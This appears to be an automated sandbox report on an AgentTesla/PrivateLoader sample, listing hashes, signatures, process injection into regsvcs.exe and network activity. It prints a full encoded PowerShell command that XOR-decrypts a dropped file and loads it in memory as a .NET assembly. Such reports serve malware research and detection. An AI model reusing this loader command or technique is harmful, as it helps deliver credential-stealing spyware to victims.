Malware Analysis Report

2025-01-02 07:37

Sample ID 240510-bq4phaae4v
Target 3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924
SHA256 3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924
Tags
agenttesla execution keylogger spyware stealer trojan privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924

Threat Level: Known bad

The file 3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924 was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger spyware stealer trojan privateloader

Privateloader family

AgentTesla

Suspicious use of SetThreadContext

Unsigned PE

Command and Scripting Interpreter: PowerShell

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 01:22

Signatures

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 01:21

Reported

2024-05-10 01:24

Platform

win7-20240419-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-10 01:21

Reported

2024-05-10 01:24

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1124 set thread context of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1328 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe C:\Windows\system32\cmd.exe
PID 1328 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe C:\Windows\system32\cmd.exe
PID 4144 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
PID 1124 wrote to memory of 4764 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe

"C:\Users\Admin\AppData\Local\Temp\3ab003a20184b2754befbeaf0e0e9576a352011f9327c69f4eeec7da91f2c924.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgAkAGYAaQBsAGUAUABhAHQAaAAgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGwANgBnADUAaAA5AHEANQBqAC4AdABtAHAAJwA7AAoAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAGYAaQBsAGUAUABhAHQAaAApADsACgAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsACgAkAGsAZQB5ACAAPQAgACIAZQA3AGUAYQA2ADAAZABlAGUAMQA0ADEANAAyAGYANwA5ADIAMgBiADgAYQA0ADQAZgA4AGMAYgA4ADUAYwBkACIAOwAKACQAawBlAHkASQBuAGQAZQB4ACAAPQAgADAAOwAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwBbACQAaQBdACAAPQAgAFsAYgB5AHQAZQBdACgAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGsAZQB5AEkAbgBkAGUAeABdACkAOwAKACAAIAAgACAAJABrAGUAeQBJAG4AZABlAHgAIAA9ACAAKAAkAGsAZQB5AEkAbgBkAGUAeAAgACsAIAAxACkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoADsACgB9AAoAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACkAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoA"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand CgAkAGYAaQBsAGUAUABhAHQAaAAgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGwANgBnADUAaAA5AHEANQBqAC4AdABtAHAAJwA7AAoAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAGYAaQBsAGUAUABhAHQAaAApADsACgAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsACgAkAGsAZQB5ACAAPQAgACIAZQA3AGUAYQA2ADAAZABlAGUAMQA0ADEANAAyAGYANwA5ADIAMgBiADgAYQA0ADQAZgA4AGMAYgA4ADUAYwBkACIAOwAKACQAawBlAHkASQBuAGQAZQB4ACAAPQAgADAAOwAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7AAoAIAAgACAAIAAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwBbACQAaQBdACAAPQAgAFsAYgB5AHQAZQBdACgAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGsAZQB5AEkAbgBkAGUAeABdACkAOwAKACAAIAAgACAAJABrAGUAeQBJAG4AZABlAHgAIAA9ACAAKAAkAGsAZQB5AEkAbgBkAGUAeAAgACsAIAAxACkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoADsACgB9AAoAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACkAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZQBuAHQAcgB5AFAAbwBpAG4AdAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAG4AdQBsAGwAKQA7AAoA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/1124-2-0x00007FFDAE003000-0x00007FFDAE005000-memory.dmp

memory/1124-12-0x000001CD200D0000-0x000001CD200F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvqjz5gp.kre.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1124-13-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

memory/1124-14-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\file-l6g5h9q5j.tmp

MD5 4956267245911f00d2153d7bb09e3968
SHA1 78fe367a3195099fd5919f9ab85472cbb0036835
SHA256 6163e0f2a5b2b3646e30110b41a465811341d8f4d8b1447f4229f5c817e898ff
SHA512 46b3c2f4e248602cff5c6dcffe994ff029774240a6de98f341fd07c66a8001ccb23d67534d6b78b2f8a0eccded4241c6e8085d6ae8163be5ca189b1a92c82fb8

memory/1124-16-0x000001CD200C0000-0x000001CD200CA000-memory.dmp

memory/1124-17-0x000001CD204D0000-0x000001CD20564000-memory.dmp

memory/1124-18-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

memory/4764-19-0x0000000000400000-0x0000000000442000-memory.dmp

memory/4764-20-0x00000000057E0000-0x0000000005D84000-memory.dmp

memory/4764-21-0x0000000005230000-0x0000000005296000-memory.dmp

memory/1124-22-0x00007FFDAE000000-0x00007FFDAEAC1000-memory.dmp

memory/4764-23-0x0000000006010000-0x0000000006060000-memory.dmp

memory/4764-24-0x0000000006100000-0x0000000006192000-memory.dmp

memory/4764-25-0x00000000060A0000-0x00000000060AA000-memory.dmp